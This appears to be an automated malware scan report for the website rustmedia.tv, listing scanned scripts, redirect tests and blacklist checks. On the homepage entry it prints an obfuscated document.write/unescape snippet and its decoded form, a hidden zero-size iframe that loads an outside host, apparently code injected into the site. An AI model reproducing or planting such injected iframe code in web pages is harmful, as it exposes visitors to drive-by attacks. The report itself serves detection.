Scanned pages/files
Request | Server response | Status |
http://rustmedia.tv/ | 200 OK Content-Length: 75660 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame.
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%65%6D%6F%73%2E%6D%6C%2F%3F%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%61%6C%69%67%6E%3D%22%6C%65%66%74%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>
http://rustmedia.tv/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/waypoints.min.js?ver=1 | 200 OK Content-Length: 8044 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/jquery.nicescroll.min.js?ver=1 | 200 OK Content-Length: 57983 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/nicescroll-init.js?ver=1 | 200 OK Content-Length: 234 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/wow.min.js?ver=1 | 200 OK Content-Length: 7057 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/wow-init.js?ver=1 | 200 OK Content-Length: 62 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/jquery.sticky.js?ver=1 | 200 OK Content-Length: 5699 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/scripts.js?ver=1 | 200 OK Content-Length: 3385 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/jquery.fitvids.js?ver=1 | 200 OK Content-Length: 2698 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/plugins/jetpack/modules/shortcodes/js/jquery.cycle.js?ver=2.9999.8 | 200 OK Content-Length: 52470 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/plugins/jetpack/modules/shortcodes/js/slideshow-shortcode.js?ver=20121214.1 | 200 OK Content-Length: 6057 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/plugins/custom-facebook-feed/js/cff-scripts.js?ver=2.3.1 | 200 OK Content-Length: 3765 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201510 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rustmedia.tv
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 04 Mar 2015 16:49:01 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Length: 75660
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/BkYT>; rel=shortlink
Set-Cookie: PHPSESSID=vbdcXbODFL4EK6VoPDgqQ0; path=/
X-Pingback: http://rustmedia.tv/xmlrpc.php
...75660 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rustmedia.tv
Referer: http://www.google.com/search?q=rustmedia.tv
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rustmedia.tv
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rustmedia.tv/
Result: rustmedia.tv is not infected or malware details are not published yet.